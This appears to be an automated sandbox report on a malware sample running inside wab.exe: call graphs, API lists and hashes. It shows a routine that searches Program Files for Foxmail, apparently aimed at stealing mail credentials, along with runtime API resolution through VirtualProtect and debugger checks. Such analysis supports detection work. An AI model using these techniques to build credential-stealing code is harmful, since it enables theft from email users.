7567 374d4ef4 7569 374d571e 20 API calls 7567->7569 7570 374d4f29 7569->7570 7571 374d4eff 7572 374d571e 20 API calls 7571->7572 7572->7567 7574 374d71bd 7573->7574 7575 374d716a 7573->7575 7576 374d4eee 7574->7576 7577 374d71c6 FreeEnvironmentStringsW 7574->7577 7578 374d7170 WideCharToMultiByte 7575->7578 7576->7567 7585 374d4f2f 7576->7585 7577->7576 7578->7574 7579 374d718c 7578->7579 7580 374d56d0 21 API calls 7579->7580 7581 374d7192 7580->7581 7582 374d7199 WideCharToMultiByte 7581->7582 7583 374d71af 7581->7583 7582->7583 7584 374d571e 20 API calls 7583->7584 7584->7574 7586 374d4f44 7585->7586 7587 374d637b 20 API calls 7586->7587 7591 374d4f6b 7587->7591 7588 374d571e 20 API calls 7590 374d4fe9 7588->7590 7589 374d4fcf 7589->7588 7590->7571 7591->7589 7592 374d637b 20 API calls 7591->7592 7593 374d4fd1 7591->7593 7594 374d544d 26 API calls 7591->7594 7597 374d4ff3 7591->7597 7600 374d571e 20 API calls 7591->7600 7592->7591 7595 374d5000 20 API calls 7593->7595 7594->7591 7596 374d4fd7 7595->7596 7598 374d571e 20 API calls 7596->7598 7599 374d62bc 11 API calls 7597->7599 7598->7589 7601 374d4fff 7599->7601 7600->7591 7046 374d5351 7047 374d5374 7046->7047 7048 374d5360 7046->7048 7049 374d571e 20 API calls 7047->7049 7048->7047 7050 374d571e 20 API calls 7048->7050 7051 374d5386 7049->7051 7050->7047 7052 374d571e 20 API calls 7051->7052 7053 374d5399 7052->7053 7054 374d571e 20 API calls 7053->7054 7055 374d53aa 7054->7055 7056 374d571e 20 API calls 7055->7056 7057 374d53bb 7056->7057 7602 374d36d0 7603 374d36e2 7602->7603 7605 374d36f0 7602->7605 7604 374d2ada 5 API calls 7603->7604 7604->7605 7702 374d3c90 RtlUnwind 7703 374d60ac 7704 374d60b7 7703->7704 7706 374d60dd 7703->7706 7705 374d60c7 FreeLibrary 7704->7705 7704->7706 7705->7704 7058 374d506f 7059 374d5081 7058->7059 7061 374d5087 7058->7061 7062 374d5000 7059->7062 7063 374d500d 7062->7063 7064 374d502a 7062->7064 7065 374d5024 7063->7065 7067 374d571e 20 API calls 7063->7067 7064->7061 7066 374d571e 20 API calls 7065->7066 7066->7064 7067->7063 7068 374dac6b 7069 374dac84 7068->7069 7071 374dacad 7069->7071 7072 374db2f0 7069->7072 7073 374db329 7072->7073 7074 374db5c1 RaiseException 7073->7074 7075 374db350 7073->7075 7074->7075 7076 374db393 7075->7076 7077 374db36e 7075->7077 7078 374db8b2 20 API calls 7076->7078 7083 374db8e1 7077->7083 7080 374db38e 7078->7080 7081 374d2ada 5 API calls 7080->7081 7082 374db3b7 7081->7082 7082->7071 7084 374db8f0 7083->7084 7085 374db90f 7084->7085 7086 374db964 7084->7086 7087 374d78a3 5 API calls 7085->7087 7088 374db8b2 20 API calls 7086->7088 7089 374db950 7087->7089 7090 374db95d 7088->7090 7089->7090 7091 374db8b2 20 API calls 7089->7091 7090->7080 7091->7090 7145 374d742b 7146 374d7430 7145->7146 7148 374d7453 7146->7148 7149 374d8bae 7146->7149 7150 374d8bbb 7149->7150 7151 374d8bdd 7149->7151 7152 374d8bc9 RtlDeleteCriticalSection 7150->7152 7153 374d8bd7 7150->7153 7151->7146 7152->7152 7152->7153 7154 374d571e 20 API calls 7153->7154 7154->7151 6464 374dc7a7 6465 374dc7be 6464->6465 6469 374dc82c 6464->6469 6465->6469 6476 374dc7e6 GetModuleHandleA 6465->6476 6467 374dc835 GetModuleHandleA 6470 374dc83f 6467->6470 6468 374dc872 6469->6467 6469->6468 6469->6470 6470->6469 6471 374dc85f GetProcAddress 6470->6471 6471->6469 6472 374dc7dd 6472->6469 6472->6470 6473 374dc800 GetProcAddress 6472->6473 6473->6469 6474 374dc80d VirtualProtect 6473->6474 6474->6469 6475 374dc81c VirtualProtect 6474->6475 6475->6469 6477 374dc7ef 6476->6477 6482 374dc82c 6476->6482 6488 374dc803 GetProcAddress 6477->6488 6479 374dc7f4 6479->6482 6483 374dc800 GetProcAddress 6479->6483 6480 374dc835 GetModuleHandleA 6486 374dc83f 6480->6486 6481 374dc872 6482->6480 6482->6481 6482->6486 6483->6482 6484 374dc80d VirtualProtect 6483->6484 6484->6482 6485 374dc81c VirtualProtect 6484->6485 6485->6482 6486->6482 6487 374dc85f GetProcAddress 6486->6487 6487->6482 6489 374dc82c 6488->6489 6490 374dc80d VirtualProtect 6488->6490 6492 374dc835 GetModuleHandleA 6489->6492 6493 374dc872 6489->6493 6490->6489 6491 374dc81c VirtualProtect 6490->6491 6491->6489 6495 374dc83f 6492->6495 6494 374dc85f GetProcAddress 6494->6495 6495->6489 6495->6494 7707 374d21a1 7710 374d2418 7707->7710 7712 374d2420 7710->7712 7714 374d47f5 7712->7714 7713 374d21bc 7715 374d4808 7714->7715 7716 374d4804 7714->7716 7719 374d4815 7715->7719 7716->7713 7720 374d5b7a 20 API calls 7719->7720 7723 374d482c 7720->7723 7721 374d2ada 5 API calls 7722 374d4811 7721->7722 7722->7713 7723->7721 7606 374da1e0 7609 374da1fe 7606->7609 7608 374da1f6 7610 374da203 7609->7610 7611 374daa53 21 API calls 7610->7611 7613 374da298 7610->7613 7612 374da42f 7611->7612 7612->7608 7613->7608 7724 374d81a0 7725 374d81d9 7724->7725 7726 374d81dd 7725->7726 7737 374d8205 7725->7737 7727 374d6368 20 API calls 7726->7727 7728 374d81e2 7727->7728 7730 374d62ac 26 API calls 7728->7730 7729 374d8529 7731 374d2ada 5 API calls 7729->7731 7732 374d81ed 7730->7732 7733 374d8536 7731->7733 7734 374d2ada 5 API calls 7732->7734 7735 374d81f9 7734->7735 7737->7729 7738 374d80c0 7737->7738 7739 374d80db 7738->7739 7740 374d2ada 5 API calls 7739->7740 7741 374d8152 7740->7741 7741->7737 7155 374d543d 7156 374d5440 7155->7156 7157 374d55a8 38 API calls 7156->7157 7158 374d544c 7157->7158 7614 374d5bff 7622 374d5d5c 7614->7622 7617 374d5c13 7618 374d5b7a 20 API calls 7619 374d5c1b 7618->7619 7620 374d5c28 7619->7620 7621 374d5c2b 11 API calls 7619->7621 7621->7617 7623 374d5c45 5 API calls 7622->7623 7624 374d5d83 7623->7624 7625 374d5d9b TlsAlloc 7624->7625 7626 374d5d8c 7624->7626 7625->7626 7627 374d2ada 5 API calls 7626->7627 7628 374d5c09 7627->7628 7628->7617 7628->7618 7742 374d67bf 7747 374d67f4 7742->7747 7745 374d67db 7746 374d571e 20 API calls 7746->7745 7748 374d6806 7747->7748 7757 374d67cd 7747->7757 7749 374d680b 7748->7749 7750 374d6836 7748->7750 7751 374d637b 20 API calls 7749->7751 7750->7757 7758 374d71d6 7750->7758 7752 374d6814 7751->7752 7754 374d571e 20 API calls 7752->7754 7754->7757 7755 374d6851 7756 374d571e 20 API calls 7755->7756 7756->7757 7757->7745 7757->7746 7759 374d71e1 7758->7759 7760 374d71fa 7759->7760 7761 374d7209 7759->7761 7762 374d6368 20 API calls 7760->7762 7764 374d7218 7761->7764 7767 374d8a98 7761->7767 7766 374d71ff 7762->7766 7774 374d8acb 7764->7774 7766->7755 7768 374d8ab8 RtlSizeHeap 7767->7768 7769 374d8aa3 7767->7769 7768->7764 7770 374d6368 20 API calls 7769->7770 7771 374d8aa8 7770->7771 7772 374d62ac 26 API calls 7771->7772 7773 374d8ab3 7772->7773 7773->7764 7775 374d8ad8 7774->7775 7776 374d8ae3 7774->7776 7777 374d56d0 21 API calls 7775->7777 7778 374d8aeb 7776->7778 7785 374d8af4 7776->7785 7783 374d8ae0 7777->7783 7779 374d571e 20 API calls 7778->7779 7779->7783 7780 374d8b1e RtlReAllocateHeap 7780->7783 7780->7785 7781 374d8af9 7782 374d6368 20 API calls 7781->7782 7782->7783 7783->7766 7784 374d474f 7 API calls 7784->7785 7785->7780 7785->7781 7785->7784 7786 374d9db8 7788 374d9dbf 7786->7788 7787 374d9e20 7789 374daa17 21 API calls 7787->7789 7790 374da90e 7787->7790 7788->7787 7792 374d9ddf 7788->7792 7791 374d9e6e 7789->7791 7792->7790 7793 374daa17 21 API calls 7792->7793 7794 374da93e 7793->7794 7092 374d9e71 7093 374d9e95 7092->7093 7094 374d9eae 7093->7094 7096 374dac6b 7093->7096 7095 374d9ef8 7094->7095 7100 374daa53 7094->7100 7098 374db2f0 21 API calls 7096->7098 7099 374dacad 7096->7099 7098->7099 7101 374daa70 RtlDecodePointer 7100->7101 7105 374daa80 7100->7105 7101->7105 7102 374d2ada 5 API calls 7104 374dac67 7102->7104 7103 374dab0d 7106 374dab02 7103->7106 7107 374d6368 20 API calls 7103->7107 7104->7095 7105->7103 7105->7106 7108 374daab7 7105->7108 7106->7102 7107->7106 7108->7106 7109 374d6368 20 API calls 7108->7109 7109->7106 7110 374d3370 7121 374d3330 7110->7121 7122 374d334f 7121->7122 7123 374d3342 7121->7123 7124 374d2ada 5 API calls 7123->7124 7124->7122 7159 374d5630 7160 374d563b 7159->7160 7162 374d5664 7160->7162 7163 374d5660 7160->7163 7165 374d5eb7 7160->7165 7172 374d5688 7162->7172 7166 374d5c45 5 API calls 7165->7166 7167 374d5ede 7166->7167 7168 374d5efc InitializeCriticalSectionAndSpinCount 7167->7168 7169 374d5ee7 7167->7169 7168->7169 7170 374d2ada 5 API calls 7169->7170 7171 374d5f13 7170->7171 7171->7160 7173 374d56b4 7172->7173 7174 374d5695 7172->7174 7173->7163 7175 374d569f RtlDeleteCriticalSection 7174->7175 7175->7173 7175->7175 7629 374d63f0 7630 374d6416 7629->7630 7631 374d6400 7629->7631 7641 374d6561 7630->7641 7642 374d6480 7630->7642 7648 374d6580 7630->7648 7632 374d6368 20 API calls 7631->7632 7633 374d6405 7632->7633 7634 374d62ac 26 API calls 7633->7634 7636 374d640f 7634->7636 7635 374d4e76 20 API calls 7640 374d64e5 7635->7640 7638 374d64ee 7639 374d571e 20 API calls 7638->7639 7639->7641 7640->7638 7640->7640 7645 374d6573 7640->7645 7659 374d85eb 7640->7659 7668 374d679a 7641->7668 7642->7635 7646 374d62bc 11 API calls 7645->7646 7647 374d657f 7646->7647 7649 374d658c 7648->7649 7649->7649 7650 374d637b 20 API calls 7649->7650 7651 374d65ba 7650->7651 7652 374d85eb 26 API calls 7651->7652 7653 374d65e6 7652->7653 7654 374d62bc 11 API calls 7653->7654 7655 374d6615 7654->7655 7656 374d66b6 FindFirstFileExA 7655->7656 7657 374d6705 7656->7657 7658 374d6580 26 API calls 7657->7658 7662 374d853a 7659->7662 7660 374d854f 7661 374d8554 7660->7661 7663 374d6368 20 API calls 7660->7663 7661->7640 7662->7660 7662->7661 7666 374d858b 7662->7666 7664 374d857a 7663->7664 7665 374d62ac 26 API calls 7664->7665 7665->7661 7666->7661 7667 374d6368 20 API calls 7666->7667 7667->7664 7669 374d67a4 7668->7669 7670 374d67b4 7669->7670 7671 374d571e 20 API calls 7669->7671 7672 374d571e 20 API calls 7670->7672 7671->7669 7673 374d67bb 7672->7673 7673->7636 7799 374d3eb3 7800 374d5411 38 API calls 7799->7800 7801 374d3ebb 7800->7801

                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                          Function 374D10F1 Relevance: 12.1, APIs: 8, Instructions: 88stringfileCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 374D1137
                                                                                                                                                                                          • lstrcatW.KERNEL32(?,?), ref: 374D1151
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 374D115C
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 374D116D
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 374D117C
                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 374D1193
                                                                                                                                                                                          • FindNextFileW.KERNELBASE(00000000,00000010), ref: 374D11D0
                                                                                                                                                                                          • FindClose.KERNELBASE(00000000), ref: 374D11DB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1083526818-0
                                                                                                                                                                                          • Opcode ID: d53567b944a84353f55e5c054f87f967ad1b9e4121e8b2cf24a2de754f886143
                                                                                                                                                                                          • Instruction ID: af7d9ddc7e1fc5304592c9ca7cfa3a7e90696631f8fa67e2539d219ef678d1f8
                                                                                                                                                                                          • Opcode Fuzzy Hash: d53567b944a84353f55e5c054f87f967ad1b9e4121e8b2cf24a2de754f886143
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2921D571A44308ABD711EA64DC49FDB7B9CEF84718F00092AF998E3191EB34F6058B96
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374D12EE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 243stringCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 374D1434
                                                                                                                                                                                            • Part of subcall function 374D10F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 374D1137
                                                                                                                                                                                            • Part of subcall function 374D10F1: lstrcatW.KERNEL32(?,?), ref: 374D1151
                                                                                                                                                                                            • Part of subcall function 374D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 374D115C
                                                                                                                                                                                            • Part of subcall function 374D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 374D116D
                                                                                                                                                                                            • Part of subcall function 374D10F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 374D117C
                                                                                                                                                                                            • Part of subcall function 374D10F1: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,?,?,00000002,00000000), ref: 374D1193
                                                                                                                                                                                            • Part of subcall function 374D10F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 374D11D0
                                                                                                                                                                                            • Part of subcall function 374D10F1: FindClose.KERNELBASE(00000000), ref: 374D11DB
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 374D14C5
                                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 374D14E0
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 374D150F
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 374D1521
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 374D1547
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 374D1553
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 374D1579
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 374D1585
                                                                                                                                                                                          • lstrlenW.KERNEL32(?,?), ref: 374D15AB
                                                                                                                                                                                          • lstrcatW.KERNEL32(00000000), ref: 374D15B7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$lstrcat$Find$File$CloseEnvironmentFirstNextVariable
                                                                                                                                                                                          • String ID: )$Foxmail$ProgramFiles
                                                                                                                                                                                          • API String ID: 672098462-2938083778
                                                                                                                                                                                          • Opcode ID: b5d92c1bba2e22219e38d86d297e061b72f2aea04d623dd5895b2c29e3f159b0
                                                                                                                                                                                          • Instruction ID: 510ad0e2032a715d049e820b556ccce0a4ca45ef6e8a2380e4b3eb977d9db893
                                                                                                                                                                                          • Opcode Fuzzy Hash: b5d92c1bba2e22219e38d86d297e061b72f2aea04d623dd5895b2c29e3f159b0
                                                                                                                                                                                          • Instruction Fuzzy Hash: A381F271A40318A9DB20DBA0DC55FEFB33CEF84710F10059AF908E7181EA756A84CF96
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374DC7E6 Relevance: 9.1, APIs: 6, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(374DC7DD), ref: 374DC7E6
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,374DC7DD), ref: 374DC838
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 374DC860
                                                                                                                                                                                            • Part of subcall function 374DC803: GetProcAddress.KERNEL32(00000000,374DC7F4), ref: 374DC804
                                                                                                                                                                                            • Part of subcall function 374DC803: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,374DC7F4,374DC7DD), ref: 374DC816
                                                                                                                                                                                            • Part of subcall function 374DC803: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,374DC7F4,374DC7DD), ref: 374DC82A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                          • Opcode ID: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                          • Instruction ID: 01e6992fb45852f35d3389495a5d398253ea8f82a4305b6796d0272c1c2968f3
                                                                                                                                                                                          • Opcode Fuzzy Hash: 18a205e926d3f8c1bd8ceb8f3c836a0ea39c7540959748e6d39d93322aab4e9f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F0122609853C03CBA1142B44C24EFA9FD89B676B3B10DB5AF0C0C6293CDA4B102C3F6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374DC7A7 Relevance: 7.6, APIs: 5, Instructions: 100libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 80 374dc7a7-374dc7bc 81 374dc82d 80->81 82 374dc7be-374dc7c6 80->82 84 374dc82f-374dc833 81->84 82->81 83 374dc7c8-374dc7f6 call 374dc7e6 82->83 91 374dc86c 83->91 92 374dc7f8 83->92 86 374dc835-374dc83d GetModuleHandleA 84->86 87 374dc872 call 374dc877 84->87 90 374dc83f-374dc847 86->90 90->90 93 374dc849-374dc84c 90->93 94 374dc86d-374dc86e 91->94 95 374dc85b-374dc85e 92->95 96 374dc7fa-374dc7fc 92->96 93->84 97 374dc84e-374dc850 93->97 98 374dc866-374dc86b 94->98 99 374dc870 94->99 100 374dc85f-374dc860 GetProcAddress 95->100 96->94 101 374dc7fe 96->101 102 374dc856-374dc85a 97->102 103 374dc852-374dc854 97->103 98->91 99->93 104 374dc865 100->104 101->104 105 374dc800-374dc80b GetProcAddress 101->105 102->95 103->100 104->98 105->81 106 374dc80d-374dc81a VirtualProtect 105->106 107 374dc82c 106->107 108 374dc81c-374dc82a VirtualProtect 106->108 107->81 108->107
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,374DC7DD), ref: 374DC838
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 374DC860
                                                                                                                                                                                            • Part of subcall function 374DC7E6: GetModuleHandleA.KERNEL32(374DC7DD), ref: 374DC7E6
                                                                                                                                                                                            • Part of subcall function 374DC7E6: GetProcAddress.KERNEL32(00000000,374DC7F4), ref: 374DC804
                                                                                                                                                                                            • Part of subcall function 374DC7E6: VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,374DC7F4,374DC7DD), ref: 374DC816
                                                                                                                                                                                            • Part of subcall function 374DC7E6: VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,374DC7F4,374DC7DD), ref: 374DC82A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2099061454-0
                                                                                                                                                                                          • Opcode ID: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                          • Instruction ID: d24a52868dcc33ba231226b7984882b42d03953c591a090689c51ffb2583d8c5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 731a18adefd9f684ec9123585341c8004b06a9316977ab842e52f252e525921e
                                                                                                                                                                                          • Instruction Fuzzy Hash: F821F9754492C16FF71147B44C24FE56FD89B572B2F19CA9AF0C0CB243D5A8B446C3A6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374DC803 Relevance: 7.6, APIs: 5, Instructions: 54librarymemoryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 109 374dc803-374dc80b GetProcAddress 110 374dc82d 109->110 111 374dc80d-374dc81a VirtualProtect 109->111 114 374dc82f-374dc833 110->114 112 374dc82c 111->112 113 374dc81c-374dc82a VirtualProtect 111->113 112->110 113->112 115 374dc835-374dc83d GetModuleHandleA 114->115 116 374dc872 call 374dc877 114->116 118 374dc83f-374dc847 115->118 118->118 119 374dc849-374dc84c 118->119 119->114 120 374dc84e-374dc850 119->120 121 374dc856-374dc85e 120->121 122 374dc852-374dc854 120->122 124 374dc85f-374dc865 GetProcAddress 121->124 122->124 126 374dc866-374dc86e 124->126 129 374dc870 126->129 129->119
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,374DC7F4), ref: 374DC804
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,374DC7F4,374DC7DD), ref: 374DC816
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,374DC7F4,374DC7DD), ref: 374DC82A
                                                                                                                                                                                          • GetModuleHandleA.KERNEL32(?,374DC7DD), ref: 374DC838
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,00000000), ref: 374DC860
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProcProtectVirtual$HandleModule
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2152742572-0
                                                                                                                                                                                          • Opcode ID: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                          • Instruction ID: 006540df36636062ffea7f3f863258c72bcbc16ece67d322690ce926c8e3daa3
                                                                                                                                                                                          • Opcode Fuzzy Hash: f81dfe0726a7f77e278230a0c4648d339da411b55a21776b762b5ef698216b3c
                                                                                                                                                                                          • Instruction Fuzzy Hash: E3F0C2A59893C07CFA1145B40C65EF69FCC8B676B3B109A56F1C0C7283DCA5B50683F6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 374D571E Relevance: 3.0, APIs: 2, Instructions: 22memoryCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 130 374d571e-374d5727 131 374d5729-374d573c RtlFreeHeap 130->131 132 374d5756-374d5757 130->132 131->132 133 374d573e-374d5755 call 374d6368 GetLastError call 374d62ef 131->133 133->132
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,00000000,?,374D924F,?,00000000,?,00000000,?,374D9276,?,00000007,?,?,374D7E5A,?), ref: 374D5734
                                                                                                                                                                                          • GetLastError.KERNEL32(?,?,374D924F,?,00000000,?,00000000,?,374D9276,?,00000007,?,?,374D7E5A,?,?), ref: 374D5746
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorFreeHeapLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 485612231-0
                                                                                                                                                                                          • Opcode ID: 447073aa689066b1e14a0db4de85214dce73ba71993b95c56e48f7863b8b9fc0
                                                                                                                                                                                          • Instruction ID: f0c7d630e4ad9901f909935da7d441d8ad7be37bb8cd693b7022c3461e9cad4f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 447073aa689066b1e14a0db4de85214dce73ba71993b95c56e48f7863b8b9fc0
                                                                                                                                                                                          • Instruction Fuzzy Hash: 35E08631540204EBDB116FA0D81D7C97B98BB846A5F100025F68CA6152DA38B541CB45
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 374D2639 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 374D2645
                                                                                                                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,00000017), ref: 374D2710
                                                                                                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,00000017), ref: 374D2730
                                                                                                                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,00000017), ref: 374D273A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.37758730530.00000000374D1000.00000040.00001000.00020000.00000000.sdmp, Offset: 374D0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.37758697033.00000000374D0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.37758730530.00000000374E6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_374d0000_wab.jbxd
                                                                                                                                                                                          Similarity
